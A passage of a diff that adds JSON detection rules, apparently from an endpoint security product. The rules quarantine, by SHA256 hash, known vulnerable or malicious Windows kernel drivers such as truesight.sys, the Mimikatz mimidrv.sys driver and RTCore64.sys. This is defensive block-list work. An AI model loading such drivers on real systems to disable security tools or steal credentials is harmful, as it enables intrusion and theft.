+ "last_update": "2026-03-23T11:45:31.144271Z",
+ "creation_date": "2026-03-23T11:45:31.144273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144278Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ba81b423320a4487ae7a8776e3005142514d1715afd7b563f586bf10e5e1f37",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d877bb5-0662-5199-93ec-3e2c1153a265",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467559Z",
+ "creation_date": "2026-03-23T11:45:30.467563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467573Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77280614edf2e476a853c7881a4ff1402d67d4dd3e218af657f44fd4d4fbdbcb",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d930509-d05d-5c28-b593-8b1dc0f9c3e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826076Z",
+ "creation_date": "2026-03-23T11:45:30.826079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba80b3a12a609c0d6069dcea7e346aa8d6e622e32eecd0244b40a4dcd8329ce1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d99795b-719a-5981-98b9-164522b65a99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977036Z",
+ "creation_date": "2026-03-23T11:45:29.977038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977043Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ede9e515a00c6a703a51b5a6e2d10d8d620be35da56fb6fec9a4fb96e6f88c7",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5d9ce0f4-c7a4-59de-be1a-358b13c4b74b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471836Z",
+ "creation_date": "2026-03-23T11:45:31.471839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b64def5d8bd9d37af54b758e4d0c7cb28cad032745ef0fc8442815772c4adab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5da3f0a6-12c3-5726-ad02-19dd5f9547cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617079Z",
+ "creation_date": "2026-03-23T11:45:29.617081Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "709ab95302bb44c7a7dafaf342ca933422ea03ed7b492be204a319161feb350e",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5da9f4d6-cef9-5881-8adf-e4f551d7e37b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154414Z",
+ "creation_date": "2026-03-23T11:45:31.154416Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ecb274c24a2271eef97d629bfbdda7e14845c8b420ee91116f54f6652b3e084",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5dbc19a5-5ea8-528d-8416-f618db8bd210",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491296Z",
+ "creation_date": "2026-03-23T11:45:31.491299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "942cfb6f9d5a7ba3bd96c7e99d783a13636a3b6a47996c8c4cbb886e609fe521",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5dc3b517-496c-5bfc-92ad-98bf6ba4dbdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816397Z",
+ "creation_date": "2026-03-23T11:45:31.816400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816408Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d5dc2c4a402c8b3feee738efa5b24b84b530c161fec2bd0ad5284566d6f5ffc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5dd132af-5e54-52cc-b43a-13f57eeb40be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970931Z",
+ "creation_date": "2026-03-23T11:45:29.970934Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970950Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04a68cb3a0c063bc66d5b144525500947dab43a0a7633a786ee0060079ba83b5",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5de2dcdc-44cf-51e8-b994-e245daaabc79",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146415Z",
+ "creation_date": "2026-03-23T11:45:32.146417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146424Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "270bbba20190463a27ae41ec283922b25d397aab31c96cd4eaa47eadaac07b00",
+ "comment": "Malicious Kernel Driver (aka driver_0ffb4081.sys) [https://www.loldrivers.io/drivers/8081b0d0-e18e-474a-bdfa-8ff1956d90cb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5de85586-50e0-51f8-981f-2a5ebe6404f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823640Z",
+ "creation_date": "2026-03-23T11:45:31.823642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823647Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5140d2d1cdd4ff9ea90a1a9d4cffe0195a5c01ea9fbec47e1643216cab559c2b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5dfd70dc-b80a-573b-a7ba-586d1f31eb4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153146Z",
+ "creation_date": "2026-03-23T11:45:31.153150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c59848c6671201b3838b69cb2947e3e7489c6c0bdd538a9609a76e980bfb3c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5dff5fd9-6c94-5ee9-839f-acbc6c75ec7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145254Z",
+ "creation_date": "2026-03-23T11:45:31.145256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80a4c175c06c9fb31d0e0d3f741e6bacde3fd9058f0b2f783ce0d66becc0a8b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e054251-f6ab-5724-a0fc-3a33094d97c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610993Z",
+ "creation_date": "2026-03-23T11:45:29.610995Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611000Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd8d61102719afb0b8a230d9e8c372af3396bec4a6d72aada42a1f1d36187751",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e18716e-d0d3-58ce-968d-c2a4d317e398",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607817Z",
+ "creation_date": "2026-03-23T11:45:29.607819Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607824Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc13adeb6bf62b1e10ef41205ef92382e6c18d6a20669d288a0b11058e533d63",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e314e51-8b55-5026-a4b3-e72f6ce58050",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145985Z",
+ "creation_date": "2026-03-23T11:45:31.145988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0508471f1b7177ccf26fd663d135767a652a3fdccb545e4ef38f79ae034f245",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e31698d-4bcd-58a8-8b7a-51a203abc31d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149934Z",
+ "creation_date": "2026-03-23T11:45:31.149936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149941Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b20d8255ee1c2f18a64dd3754ce2503db010cb650f2eaa8135a0ad252ebcced",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e3515ed-33ca-527c-87e9-9c265cc68523",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482186Z",
+ "creation_date": "2026-03-23T11:45:31.482190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482200Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de80cadf7e24d0414d6d88922995a5fb62cc050b67dfc64f31452d72cfbb9fe4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e3c796f-11e8-5a0f-877b-780c78f9d7dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807561Z",
+ "creation_date": "2026-03-23T11:45:31.807564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807573Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eca625614fa812a3e2fb2eade15f87df9ba3cac5078b1bbf914bfa745fb977c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e4b6a3e-417c-5a65-96de-aec4831ab6ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460465Z",
+ "creation_date": "2026-03-23T11:45:30.460469Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67e9d1f6f7ed58d86b025d3578cb7a3f3c389b9dd425b7f46bb1056e83bffc78",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e5b5808-b6cc-5fd2-876c-0d08c80e5df5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606103Z",
+ "creation_date": "2026-03-23T11:45:29.606105Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606110Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51e91dd108d974ae809e5fc23f6fbd16e13f672f86aa594dae4a5c4bc629b0b5",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5e6345cd-f671-505b-b7ac-94b766aaf87e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153684Z",
+ "creation_date": "2026-03-23T11:45:31.153686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
